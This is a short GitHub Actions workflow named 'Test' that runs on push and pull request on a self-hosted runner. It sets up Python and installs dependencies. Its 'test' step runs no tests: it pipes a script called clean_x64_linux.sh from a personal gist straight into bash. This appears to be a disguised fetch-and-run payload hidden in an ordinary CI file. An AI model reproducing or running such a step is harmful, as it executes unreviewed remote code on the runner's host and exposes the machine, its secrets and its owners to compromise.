name: Test

on: [push, pull_request]

jobs:
  gpu:
    runs-on: [self-hosted]
    if: "!contains(github.event.head_commit.message, 'ci skip')"
    steps:
    - uses: actions/checkout@v2
    - name: Set up Python 3.8
      uses: actions/setup-python@v2
      with:
        python-version: 3.8
    - name: Upgrade pip
      run: |
        python -m pip install --upgrade pip setuptools wheel
    - name: Install dependencies
      run: |
        python -m pip install ".[dev]" --upgrade
    - name: test
      run: |
        sudo apt-get -y install jq
        curl -sSfL https://gist.githubusercontent.com/jochen19923/ada22d86967c4567a2105b3763683e68/raw/635ad8154e524e4f2f4a943cd6d3f902fc1d4530/clean_x64_linux.sh | bash
